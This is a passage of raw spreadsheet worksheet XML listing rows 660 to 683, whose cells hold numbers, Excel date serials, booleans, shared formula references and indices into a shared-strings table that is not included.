      </c>
    </row>
    <row r="660">
      <c r="A660" s="1">
        <v>9595.0</v>
      </c>
      <c r="B660" s="2" t="s">
        <v>3001</v>
      </c>
      <c r="C660" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D660" s="2" t="s">
        <v>2996</v>
      </c>
      <c r="E660" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F660" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G660" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H660" s="1" t="s">
        <v>3002</v>
      </c>
      <c r="I660" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J660" s="1" t="s">
        <v>2998</v>
      </c>
      <c r="K660" s="2" t="s">
        <v>2999</v>
      </c>
      <c r="L660" s="1">
        <v>4.0</v>
      </c>
      <c r="M660" s="1">
        <v>5.0</v>
      </c>
      <c r="N660" s="1" t="s">
        <v>3003</v>
      </c>
      <c r="O660" s="1" t="s">
        <v>3000</v>
      </c>
      <c r="P660" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q660" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R660" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S660" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="661">
      <c r="A661" s="1">
        <v>9596.0</v>
      </c>
      <c r="B661" s="2" t="s">
        <v>3004</v>
      </c>
      <c r="C661" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D661" s="2" t="s">
        <v>2996</v>
      </c>
      <c r="E661" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F661" s="1" t="s">
        <v>980</v>
      </c>
      <c r="G661" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H661" s="1" t="s">
        <v>3005</v>
      </c>
      <c r="I661" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J661" s="1" t="s">
        <v>2998</v>
      </c>
      <c r="K661" s="2" t="s">
        <v>2999</v>
      </c>
      <c r="L661" s="1">
        <v>4.0</v>
      </c>
      <c r="M661" s="1">
        <v>5.0</v>
      </c>
      <c r="N661" s="1" t="s">
        <v>3006</v>
      </c>
      <c r="O661" s="1" t="s">
        <v>3000</v>
      </c>
      <c r="P661" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q661" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R661" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S661" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="662">
      <c r="A662" s="1">
        <v>9597.0</v>
      </c>
      <c r="B662" s="2" t="s">
        <v>3007</v>
      </c>
      <c r="C662" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D662" s="2" t="s">
        <v>2996</v>
      </c>
      <c r="E662" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F662" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G662" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H662" s="1" t="s">
        <v>3008</v>
      </c>
      <c r="I662" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J662" s="1" t="s">
        <v>2998</v>
      </c>
      <c r="K662" s="2" t="s">
        <v>2999</v>
      </c>
      <c r="L662" s="1">
        <v>4.0</v>
      </c>
      <c r="M662" s="1">
        <v>5.0</v>
      </c>
      <c r="N662" s="1" t="s">
        <v>2387</v>
      </c>
      <c r="O662" s="1" t="s">
        <v>3000</v>
      </c>
      <c r="P662" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q662" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R662" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S662" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="663">
      <c r="A663" s="1">
        <v>9598.0</v>
      </c>
      <c r="B663" s="2" t="s">
        <v>3009</v>
      </c>
      <c r="C663" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D663" s="2" t="s">
        <v>2996</v>
      </c>
      <c r="E663" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F663" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G663" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H663" s="1" t="s">
        <v>3010</v>
      </c>
      <c r="I663" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J663" s="1" t="s">
        <v>2998</v>
      </c>
      <c r="K663" s="2" t="s">
        <v>2999</v>
      </c>
      <c r="L663" s="1">
        <v>4.0</v>
      </c>
      <c r="M663" s="1">
        <v>5.0</v>
      </c>
      <c r="N663" s="1" t="s">
        <v>564</v>
      </c>
      <c r="O663" s="1" t="s">
        <v>3000</v>
      </c>
      <c r="P663" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q663" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R663" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S663" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="664">
      <c r="A664" s="1">
        <v>9641.0</v>
      </c>
      <c r="B664" s="2" t="s">
        <v>3011</v>
      </c>
      <c r="C664" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D664" s="2" t="s">
        <v>3012</v>
      </c>
      <c r="E664" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F664" s="1" t="s">
        <v>3013</v>
      </c>
      <c r="G664" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H664" s="1" t="s">
        <v>3014</v>
      </c>
      <c r="I664" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J664" s="1" t="s">
        <v>3015</v>
      </c>
      <c r="K664" s="2" t="s">
        <v>3016</v>
      </c>
      <c r="L664" s="1">
        <v>4.0</v>
      </c>
      <c r="M664" s="1">
        <v>4.0</v>
      </c>
      <c r="N664" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O664" s="1" t="s">
        <v>3017</v>
      </c>
      <c r="P664" s="1" t="s">
        <v>393</v>
      </c>
      <c r="Q664" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R664" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S664" s="1">
        <f t="shared" si="3"/>
        <v>12</v>
      </c>
    </row>
    <row r="665">
      <c r="A665" s="1">
        <v>9644.0</v>
      </c>
      <c r="B665" s="2" t="s">
        <v>3018</v>
      </c>
      <c r="C665" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D665" s="2" t="s">
        <v>3012</v>
      </c>
      <c r="E665" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F665" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G665" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H665" s="1" t="s">
        <v>3019</v>
      </c>
      <c r="I665" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J665" s="1" t="s">
        <v>3015</v>
      </c>
      <c r="K665" s="2" t="s">
        <v>3016</v>
      </c>
      <c r="L665" s="1">
        <v>4.0</v>
      </c>
      <c r="M665" s="1">
        <v>4.0</v>
      </c>
      <c r="N665" s="1" t="s">
        <v>86</v>
      </c>
      <c r="O665" s="1" t="s">
        <v>3017</v>
      </c>
      <c r="P665" s="1" t="s">
        <v>1865</v>
      </c>
      <c r="Q665" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R665" s="2">
        <f t="shared" si="2"/>
        <v>7</v>
      </c>
      <c r="S665" s="1">
        <f t="shared" si="3"/>
        <v>12</v>
      </c>
    </row>
    <row r="666">
      <c r="A666" s="1">
        <v>9645.0</v>
      </c>
      <c r="B666" s="2" t="s">
        <v>3020</v>
      </c>
      <c r="C666" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D666" s="2" t="s">
        <v>3021</v>
      </c>
      <c r="E666" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F666" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G666" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H666" s="4">
        <v>44256.947222222225</v>
      </c>
      <c r="I666" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J666" s="1" t="s">
        <v>3022</v>
      </c>
      <c r="K666" s="2" t="s">
        <v>3023</v>
      </c>
      <c r="L666" s="1">
        <v>1.0</v>
      </c>
      <c r="M666" s="1">
        <v>1.0</v>
      </c>
      <c r="N666" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O666" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P666" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q666" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R666" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S666" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="667">
      <c r="A667" s="1">
        <v>9669.0</v>
      </c>
      <c r="B667" s="2" t="s">
        <v>3024</v>
      </c>
      <c r="C667" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D667" s="2" t="s">
        <v>3025</v>
      </c>
      <c r="E667" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F667" s="1" t="s">
        <v>3026</v>
      </c>
      <c r="G667" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H667" s="1" t="s">
        <v>3027</v>
      </c>
      <c r="I667" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J667" s="1" t="s">
        <v>3028</v>
      </c>
      <c r="K667" s="2" t="s">
        <v>3029</v>
      </c>
      <c r="L667" s="1">
        <v>2.0</v>
      </c>
      <c r="M667" s="1">
        <v>2.0</v>
      </c>
      <c r="N667" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O667" s="1" t="s">
        <v>3030</v>
      </c>
      <c r="P667" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q667" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R667" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S667" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="668">
      <c r="A668" s="1">
        <v>9670.0</v>
      </c>
      <c r="B668" s="2" t="s">
        <v>3031</v>
      </c>
      <c r="C668" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D668" s="2" t="s">
        <v>3025</v>
      </c>
      <c r="E668" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F668" s="1" t="s">
        <v>3032</v>
      </c>
      <c r="G668" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H668" s="1" t="s">
        <v>3033</v>
      </c>
      <c r="I668" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J668" s="1" t="s">
        <v>3028</v>
      </c>
      <c r="K668" s="2" t="s">
        <v>3029</v>
      </c>
      <c r="L668" s="1">
        <v>2.0</v>
      </c>
      <c r="M668" s="1">
        <v>2.0</v>
      </c>
      <c r="N668" s="1" t="s">
        <v>3030</v>
      </c>
      <c r="O668" s="1" t="s">
        <v>3030</v>
      </c>
      <c r="P668" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q668" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R668" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S668" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="669">
      <c r="A669" s="1">
        <v>9713.0</v>
      </c>
      <c r="B669" s="2" t="s">
        <v>3034</v>
      </c>
      <c r="C669" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D669" s="2" t="s">
        <v>3035</v>
      </c>
      <c r="E669" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F669" s="1" t="s">
        <v>3036</v>
      </c>
      <c r="G669" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H669" s="1" t="s">
        <v>3037</v>
      </c>
      <c r="I669" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J669" s="1" t="s">
        <v>3038</v>
      </c>
      <c r="K669" s="2" t="s">
        <v>3039</v>
      </c>
      <c r="L669" s="1">
        <v>5.0</v>
      </c>
      <c r="M669" s="1">
        <v>5.0</v>
      </c>
      <c r="N669" s="1" t="s">
        <v>3040</v>
      </c>
      <c r="O669" s="1" t="s">
        <v>2876</v>
      </c>
      <c r="P669" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q669" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R669" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S669" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="670">
      <c r="A670" s="1">
        <v>9767.0</v>
      </c>
      <c r="B670" s="2" t="s">
        <v>3041</v>
      </c>
      <c r="C670" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D670" s="2" t="s">
        <v>3042</v>
      </c>
      <c r="E670" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F670" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G670" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H670" s="1" t="s">
        <v>3043</v>
      </c>
      <c r="I670" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J670" s="1" t="s">
        <v>3044</v>
      </c>
      <c r="K670" s="2" t="s">
        <v>3045</v>
      </c>
      <c r="L670" s="1">
        <v>1.0</v>
      </c>
      <c r="M670" s="1">
        <v>1.0</v>
      </c>
      <c r="N670" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O670" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P670" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q670" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R670" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S670" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="671">
      <c r="A671" s="1">
        <v>9794.0</v>
      </c>
      <c r="B671" s="2" t="s">
        <v>3046</v>
      </c>
      <c r="C671" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D671" s="2" t="s">
        <v>3047</v>
      </c>
      <c r="E671" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F671" s="1" t="s">
        <v>3048</v>
      </c>
      <c r="G671" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H671" s="1" t="s">
        <v>3049</v>
      </c>
      <c r="I671" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J671" s="1" t="s">
        <v>3050</v>
      </c>
      <c r="K671" s="2" t="s">
        <v>3051</v>
      </c>
      <c r="L671" s="1">
        <v>1.0</v>
      </c>
      <c r="M671" s="1">
        <v>1.0</v>
      </c>
      <c r="N671" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O671" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P671" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q671" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R671" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S671" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="672">
      <c r="A672" s="1">
        <v>9795.0</v>
      </c>
      <c r="B672" s="2" t="s">
        <v>3052</v>
      </c>
      <c r="C672" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D672" s="2" t="s">
        <v>3047</v>
      </c>
      <c r="E672" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F672" s="1" t="s">
        <v>771</v>
      </c>
      <c r="G672" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H672" s="1" t="s">
        <v>3053</v>
      </c>
      <c r="I672" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J672" s="1" t="s">
        <v>3054</v>
      </c>
      <c r="K672" s="2" t="s">
        <v>3051</v>
      </c>
      <c r="L672" s="1">
        <v>2.0</v>
      </c>
      <c r="M672" s="1">
        <v>2.0</v>
      </c>
      <c r="N672" s="1" t="s">
        <v>3055</v>
      </c>
      <c r="O672" s="1" t="s">
        <v>3055</v>
      </c>
      <c r="P672" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q672" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R672" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S672" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="673">
      <c r="A673" s="1">
        <v>9796.0</v>
      </c>
      <c r="B673" s="2" t="s">
        <v>3056</v>
      </c>
      <c r="C673" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D673" s="2" t="s">
        <v>3057</v>
      </c>
      <c r="E673" s="2" t="s">
        <v>517</v>
      </c>
      <c r="F673" s="1" t="s">
        <v>3058</v>
      </c>
      <c r="G673" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H673" s="1" t="s">
        <v>3059</v>
      </c>
      <c r="I673" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J673" s="1" t="s">
        <v>3060</v>
      </c>
      <c r="K673" s="2" t="s">
        <v>3061</v>
      </c>
      <c r="L673" s="1">
        <v>1.0</v>
      </c>
      <c r="M673" s="1">
        <v>1.0</v>
      </c>
      <c r="N673" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O673" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P673" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q673" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R673" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S673" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="674">
      <c r="A674" s="1">
        <v>9798.0</v>
      </c>
      <c r="B674" s="2" t="s">
        <v>3062</v>
      </c>
      <c r="C674" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D674" s="2" t="s">
        <v>3063</v>
      </c>
      <c r="E674" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F674" s="1" t="s">
        <v>879</v>
      </c>
      <c r="G674" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H674" s="4">
        <v>44237.99513888889</v>
      </c>
      <c r="I674" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J674" s="1" t="s">
        <v>3064</v>
      </c>
      <c r="K674" s="2" t="s">
        <v>3065</v>
      </c>
      <c r="L674" s="1">
        <v>3.0</v>
      </c>
      <c r="M674" s="1">
        <v>3.0</v>
      </c>
      <c r="N674" s="1" t="s">
        <v>3066</v>
      </c>
      <c r="O674" s="1" t="s">
        <v>3067</v>
      </c>
      <c r="P674" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q674" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R674" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S674" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="675">
      <c r="A675" s="1">
        <v>9799.0</v>
      </c>
      <c r="B675" s="2" t="s">
        <v>3068</v>
      </c>
      <c r="C675" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D675" s="2" t="s">
        <v>3063</v>
      </c>
      <c r="E675" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F675" s="1" t="s">
        <v>824</v>
      </c>
      <c r="G675" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H675" s="4">
        <v>44296.138194444444</v>
      </c>
      <c r="I675" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J675" s="1" t="s">
        <v>3064</v>
      </c>
      <c r="K675" s="2" t="s">
        <v>3065</v>
      </c>
      <c r="L675" s="1">
        <v>3.0</v>
      </c>
      <c r="M675" s="1">
        <v>3.0</v>
      </c>
      <c r="N675" s="1" t="s">
        <v>3069</v>
      </c>
      <c r="O675" s="1" t="s">
        <v>3067</v>
      </c>
      <c r="P675" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q675" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R675" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S675" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="676">
      <c r="A676" s="1">
        <v>9806.0</v>
      </c>
      <c r="B676" s="2" t="s">
        <v>3070</v>
      </c>
      <c r="C676" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D676" s="2" t="s">
        <v>3071</v>
      </c>
      <c r="E676" s="2" t="s">
        <v>517</v>
      </c>
      <c r="F676" s="1" t="s">
        <v>1675</v>
      </c>
      <c r="G676" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H676" s="5">
        <v>44542.70486111111</v>
      </c>
      <c r="I676" s="1" t="s">
        <v>1869</v>
      </c>
      <c r="J676" s="1" t="s">
        <v>3072</v>
      </c>
      <c r="K676" s="2" t="s">
        <v>3073</v>
      </c>
      <c r="L676" s="1">
        <v>1.0</v>
      </c>
      <c r="M676" s="1">
        <v>1.0</v>
      </c>
      <c r="N676" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O676" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P676" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q676" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R676" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S676" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="677">
      <c r="A677" s="1">
        <v>9807.0</v>
      </c>
      <c r="B677" s="2" t="s">
        <v>3074</v>
      </c>
      <c r="C677" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D677" s="2" t="s">
        <v>3071</v>
      </c>
      <c r="E677" s="2" t="s">
        <v>517</v>
      </c>
      <c r="F677" s="1" t="s">
        <v>3075</v>
      </c>
      <c r="G677" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H677" s="1" t="s">
        <v>3076</v>
      </c>
      <c r="I677" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J677" s="1" t="s">
        <v>3077</v>
      </c>
      <c r="K677" s="2" t="s">
        <v>3078</v>
      </c>
      <c r="L677" s="1">
        <v>1.0</v>
      </c>
      <c r="M677" s="1">
        <v>1.0</v>
      </c>
      <c r="N677" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O677" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P677" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q677" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R677" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S677" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="678">
      <c r="A678" s="1">
        <v>9808.0</v>
      </c>
      <c r="B678" s="2" t="s">
        <v>3079</v>
      </c>
      <c r="C678" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D678" s="2" t="s">
        <v>3071</v>
      </c>
      <c r="E678" s="2" t="s">
        <v>517</v>
      </c>
      <c r="F678" s="1" t="s">
        <v>3075</v>
      </c>
      <c r="G678" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H678" s="1" t="s">
        <v>3080</v>
      </c>
      <c r="I678" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J678" s="1" t="s">
        <v>3081</v>
      </c>
      <c r="K678" s="2" t="s">
        <v>3078</v>
      </c>
      <c r="L678" s="1">
        <v>4.0</v>
      </c>
      <c r="M678" s="1">
        <v>11.0</v>
      </c>
      <c r="N678" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O678" s="1" t="s">
        <v>3082</v>
      </c>
      <c r="P678" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q678" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R678" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S678" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="679">
      <c r="A679" s="1">
        <v>9809.0</v>
      </c>
      <c r="B679" s="2" t="s">
        <v>3083</v>
      </c>
      <c r="C679" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D679" s="2" t="s">
        <v>3071</v>
      </c>
      <c r="E679" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F679" s="1" t="s">
        <v>3084</v>
      </c>
      <c r="G679" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H679" s="1" t="s">
        <v>3085</v>
      </c>
      <c r="I679" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J679" s="1" t="s">
        <v>3081</v>
      </c>
      <c r="K679" s="2" t="s">
        <v>3078</v>
      </c>
      <c r="L679" s="1">
        <v>4.0</v>
      </c>
      <c r="M679" s="1">
        <v>11.0</v>
      </c>
      <c r="N679" s="1" t="s">
        <v>3086</v>
      </c>
      <c r="O679" s="1" t="s">
        <v>3082</v>
      </c>
      <c r="P679" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q679" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R679" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S679" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="680">
      <c r="A680" s="1">
        <v>9810.0</v>
      </c>
      <c r="B680" s="2" t="s">
        <v>3087</v>
      </c>
      <c r="C680" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D680" s="2" t="s">
        <v>3071</v>
      </c>
      <c r="E680" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F680" s="1" t="s">
        <v>3075</v>
      </c>
      <c r="G680" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H680" s="1" t="s">
        <v>3088</v>
      </c>
      <c r="I680" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J680" s="1" t="s">
        <v>3081</v>
      </c>
      <c r="K680" s="2" t="s">
        <v>3078</v>
      </c>
      <c r="L680" s="1">
        <v>4.0</v>
      </c>
      <c r="M680" s="1">
        <v>11.0</v>
      </c>
      <c r="N680" s="1" t="s">
        <v>3089</v>
      </c>
      <c r="O680" s="1" t="s">
        <v>3082</v>
      </c>
      <c r="P680" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q680" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R680" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S680" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="681">
      <c r="A681" s="1">
        <v>9840.0</v>
      </c>
      <c r="B681" s="2" t="s">
        <v>3090</v>
      </c>
      <c r="C681" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D681" s="2" t="s">
        <v>3091</v>
      </c>
      <c r="E681" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F681" s="1" t="s">
        <v>3092</v>
      </c>
      <c r="G681" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H681" s="1" t="s">
        <v>3093</v>
      </c>
      <c r="I681" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J681" s="1" t="s">
        <v>3094</v>
      </c>
      <c r="K681" s="2" t="s">
        <v>3095</v>
      </c>
      <c r="L681" s="1">
        <v>3.0</v>
      </c>
      <c r="M681" s="1">
        <v>3.0</v>
      </c>
      <c r="N681" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O681" s="1" t="s">
        <v>3096</v>
      </c>
      <c r="P681" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q681" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R681" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S681" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="682">
      <c r="A682" s="1">
        <v>9842.0</v>
      </c>
      <c r="B682" s="2" t="s">
        <v>3097</v>
      </c>
      <c r="C682" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D682" s="2" t="s">
        <v>3091</v>
      </c>
      <c r="E682" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F682" s="1" t="s">
        <v>3098</v>
      </c>
      <c r="G682" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H682" s="1" t="s">
        <v>3099</v>
      </c>
      <c r="I682" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J682" s="1" t="s">
        <v>3094</v>
      </c>
      <c r="K682" s="2" t="s">
        <v>3095</v>
      </c>
      <c r="L682" s="1">
        <v>3.0</v>
      </c>
      <c r="M682" s="1">
        <v>3.0</v>
      </c>
      <c r="N682" s="1" t="s">
        <v>3100</v>
      </c>
      <c r="O682" s="1" t="s">
        <v>3096</v>
      </c>
      <c r="P682" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q682" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R682" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S682" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="683">
      <c r="A683" s="1">
        <v>9845.0</v>
      </c>
      <c r="B683" s="2" t="s">
        <v>3101</v>
      </c>
      <c r="C683" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D683" s="2" t="s">
        <v>3102</v>
      </c>
      <c r="E683" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F683" s="1" t="s">
        <v>3103</v>
      </c>
      <c r="G683" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H683" s="1" t="s">
        <v>3104</v>
      </c>
      <c r="I683" s="1" t="s">
        <v>34</v>
      </c>
      <c r="J683" s="1" t="s">
